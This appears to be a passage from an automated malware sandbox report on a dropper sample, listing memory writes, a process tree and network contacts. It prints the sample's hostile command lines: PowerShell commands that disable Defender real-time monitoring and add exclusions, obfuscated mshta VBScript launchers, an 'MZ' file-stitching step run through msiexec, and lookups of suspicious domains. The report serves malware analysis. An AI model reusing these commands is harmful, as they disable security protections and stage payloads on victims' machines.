N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3688 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3688 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3688 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 836 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe
PID 836 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe
PID 836 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe
PID 2212 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1224 wrote to memory of 4944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 4944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 4944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4784 wrote to memory of 1840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4784 wrote to memory of 1840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4784 wrote to memory of 1840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2212 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 4264 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
PID 2212 wrote to memory of 4264 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
PID 2212 wrote to memory of 4264 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
PID 2212 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1524 wrote to memory of 4920 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue192c34b1c2f5.exe

Processes

C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe

"C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19ac3c92c21.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c9e031f4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1932df4dae.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue193e530416b51740a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c28f648204dbd4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1968b7ee9058232e8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue196397c0f84f8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue192c34b1c2f5.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue197e9ec0ff0.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue193129b31e741ef3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19cef5687a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19d1fc7d2654d7a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19cd42a7c874e44.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19b4b38a7569a9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue192c34b1c2f5.exe

Tue192c34b1c2f5.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe

Tue196397c0f84f8.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19ac3c92c21.exe

Tue19ac3c92c21.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19c9e031f4.exe

Tue19c9e031f4.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1968b7ee9058232e8.exe

Tue1968b7ee9058232e8.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19b4b38a7569a9.exe

Tue19b4b38a7569a9.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue197e9ec0ff0.exe

Tue197e9ec0ff0.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe

Tue193e530416b51740a.exe

C:\Users\Admin\AppData\Local\Temp\is-AKAG5.tmp\Tue196397c0f84f8.tmp

"C:\Users\Admin\AppData\Local\Temp\is-AKAG5.tmp\Tue196397c0f84f8.tmp" /SL5="$60228,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2212 -ip 2212

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe

Tue1932df4dae.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19cd42a7c874e44.exe

Tue19cd42a7c874e44.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19cef5687a.exe

Tue19cef5687a.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19c28f648204dbd4.exe

Tue19c28f648204dbd4.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 640

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe

Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe

Tue193129b31e741ef3.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe

Tue19d1fc7d2654d7a.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe

"C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-1NAED.tmp\Tue196397c0f84f8.tmp

"C:\Users\Admin\AppData\Local\Temp\is-1NAED.tmp\Tue196397c0f84f8.tmp" /SL5="$A006C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1668 -ip 1668

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 12

C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe

~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1516 -ip 1516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 360

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Tue1932df4dae.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE ( cREatEObjEcT ( "wscript.sHeLl" ). Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 , TruE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ECHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\msiexec.exe

msiexec -Y .\bENCc.E

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc140ecc40,0x7ffc140ecc4c,0x7ffc140ecc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1920 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2152,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2120 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2236,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2204 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3076,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3096 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3120,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3240 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4524,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4484 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3684,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4720 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4540 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4988,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4976 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4660,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4364 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 67.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 marianu.xyz udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 www.listincode.com udp
US 54.205.158.59:443 www.listincode.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 niemannbest.me udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 propanla.com udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
US 52.203.72.196:443 www.listincode.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 s.lletlee.com udp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 telegatt.top udp
US 8.8.8.8:53 gcl-gb.biz udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 telegatt.top udp
US 8.8.8.8:53 gcl-gb.biz udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 www.iyiqian.com udp
US 8.8.8.8:53 t.gogamec.com udp
